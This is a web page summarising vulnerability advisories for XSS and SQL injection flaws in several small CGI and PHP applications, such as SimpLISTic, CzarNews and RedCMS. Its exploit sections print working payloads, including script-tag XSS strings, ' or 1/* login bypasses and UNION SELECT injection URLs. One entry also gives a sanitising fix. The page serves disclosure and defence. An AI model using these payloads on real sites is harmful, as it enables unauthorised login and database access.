Recent Email XSS vulnerabilities

Here is short summary of recent Email XSS vulnerabilities discovered by eVuln team. Full list with details is available on the eVuln Security Advisories page.

email XSS in SimpLISTic.

Description.

XSS vulnerability found in email.cgi script. email parameter is not properly sanitized. email parameter pass through similar filter but not XSS filter. Any user may add email containing special code. "List addresses" page in Admin panel is vulnerable.

Exploit.

email XSS PoC code for SimpLISTic is available.

Email: email@website.com</textarea><script>alert('XSS vulnerability')</script>

Solution.

email paramether pass through simple filter:
if (($FORM{email} =~ m/@/) && ($FORM{email} =~ m/\./)) {$atcheck = 1}

This is not enough to sanitize XSS code. Recommended fix is:
$FORM{email} =~ s/\&/\&amp\;/g;
$FORM{email} =~ s/\</\&lt\;/g;
$FORM{email} =~ s/\>/\&gt\;/g;
$FORM{email} =~ s/\"/\&quot\;/g;
$FORM{email} =~ s/\'/\&#x27\;/g;
$FORM{email} =~ s/\//\&#x2F\;/g;

Apply this filter before including $FORM{email} into HTML code.

Check for updates from MrCgiGuy website: http://www.mrcgiguy.com/

Other details >>

Multiple XSS in MCG GuestBook.

Description.

All vulnerabilities found in gb.cgi script. It doesn't have proper XSS sanitation filters.

  • name
  • email
  • website
  • message

All these parameters are not sanitized. This can be used to insert any html or script code. Admin panel is vulnerable also.

Exploit.

All form parameters dont pass any XSS sanitation filters.

Parameter "name": <script>alert('XSS Vuln')</script>

Parameter "email": "<script>alert('Vulnerable')</script>

Parameter "website": "<script>alert('Vulnerable')</script>

Parameter "message": <script>alert('XSS Vuln')</script>

Solution

Solution is not available.

Other details >>

XSS and Multiple SQL Injection in CzarNews.

Description.

Vulnerable Script: news.php

Parameter email is not properly sanitized. This can be used to post arbitrary HTML or web script code.

Condition: magic_quotes_gpc = off

Vulnerable scripts: </p><p>cn_auth.php</p><p>news.php</p>

Parameters usern(cn_auth.php), passw(cn_auth.php), s(news.php), a(dpost.php) are not properly sanitized before being used in SQL queries. This can be used to bypass authentication or make any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc = off

Exploit.

URL: http://[host]/news.php?a=1

Post a Comment

Email: ">[XSS]<aaa aaa="

URL: http://[host]/index.php

Username: ' or 1/*

Password: any

URL: http://[host]/news.php

News Search: zzzz%' union select 1,2,3,4,5,6,7,8,9,10/*

URL: http://[host]/news.php?a=999'%20union%20select%201,2,3,4,5,6,7,8,9,10/*

Solution

Solution is not available.

Other details >>

Multiple XSS and SQL Injection in aWebNews.

Description.

Vulnerable Script: visview.php

Parameters yname, emailadd, subject, comment are not properly sanitized. This can be used to post arbitrary HTML or web script code.

Vulnerable scripts: login.php fpass.php visview.php

Variables $user123(login.php), $user123(fpass.php), $_GET['cid'](visview.php) are not properly sanitized before being used in SQL queries. This can be used to make any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc = off

Exploit.

URL: http://[host]/visview.php?b=newc&cid=2916852

Your Name: [XSS]

Email / Website: aaa">[XSS]<aaa aaa="

Comment Subject: [XSS]

Comment Text: [XSS]

URL: http://[host]/visview.php?a=c&cid=2916852'%20union%20select%201,2,3,4,5,6/*

Solution

Solution is not available.

Other details >>

Multiple XSS and SQL Injection in RedCMS.

Description.

Vulnerable Script:register.php

Parameters email, location, website are not properly sanitized. This can be used to post arbitrary HTML or web script code.

Vulnerable scripts: </p><p>login.php</p><p>profile.php</p><p>register.php</p><p>...</p>

Variables $username(login.php), $password(login.php), $u(profile.php), $username(register.php), $password(register.php),... All user-defined variables are not properly sanitized before being used in SQL queries. This can be used to bypass authentication or make any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc = off

Exploit.

URL: http://[host]/redcms/register.php

Email: aaa'>[XSS]<aaa aaa=';

Location: aaa'>[XSS]<aaa aaa=';

Website: aaa'>[XSS]<aaa aaa=';

URL: http://[host]/redcms/login.php

Username: ' or 1/*

Password: any

URL: http://[host]/redcms/profile.php? id=99'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,161,7,18,19,20/*

Solution

Solution is not available.

Other details >>
Advisories by vuln type